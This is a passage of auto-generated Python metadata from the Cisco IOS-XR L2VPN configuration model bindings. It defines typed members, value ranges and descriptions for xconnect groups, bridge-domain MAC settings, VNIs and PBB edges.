_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' Mac Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
''' Filter Mac Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Mac Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Mac withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
[], [],
''' PBB Static Mac Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Accept Virtual instance port to be
shutdown on mac violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
